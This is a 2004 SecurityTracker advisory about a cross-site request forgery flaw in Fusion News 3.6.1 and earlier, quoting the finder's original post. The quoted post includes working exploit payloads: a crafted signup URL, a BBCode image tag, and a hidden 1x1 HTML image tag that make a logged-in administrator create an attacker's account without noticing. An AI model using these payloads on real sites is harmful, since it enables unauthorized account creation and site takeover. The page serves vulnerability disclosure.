SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Fusion News Vendors:   FusionPHP
Fusion News Lets Remote Users Add User Accounts on the Application
SecurityTracker Alert ID:  1010829
SecurityTracker URL:  http://securitytracker.com/id/1010829
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 31 2004
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 3.6.1 and prior versions
Description:   A vulnerability was reported in Fusion News. A remote user can add a user account.

r3d5pik3 reported that a remote user can create a specially crafted URL that, when loaded by a target administrator, will cause a user account to be added to Fusion News. The malicious URL can be placed in a BBCode image tag within a comment and then executed when the target administrator views the comment, for example.

A demonstration exploit URL is provided:

http://[target]/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffs

Impact:   A remote user can cause an administrator to create a new user account.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.fusionphp.net/index.php?cat=fnews&page=downloads (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Fusion News Yet Another Unauthorized Account Addition Vulnerability




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY patching the previous similar exploit. Basicly all
 the vendor did to stop the last vulnrability was make it so you had to be signd on as an admin to creat an account, and that is simply
 just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnrability this one you cant simply type something into the url bar and press enter. All you have to
 do is make sure the admin is logged on then do one of the following. (the first is probably the most reliable for an attacker)
1.)Leave them a comment with an [img] bbcode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]

2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By convincing him to go to a site that has a malicious
 <img> tag such as the following

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1"
 size="1" width="1">

That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC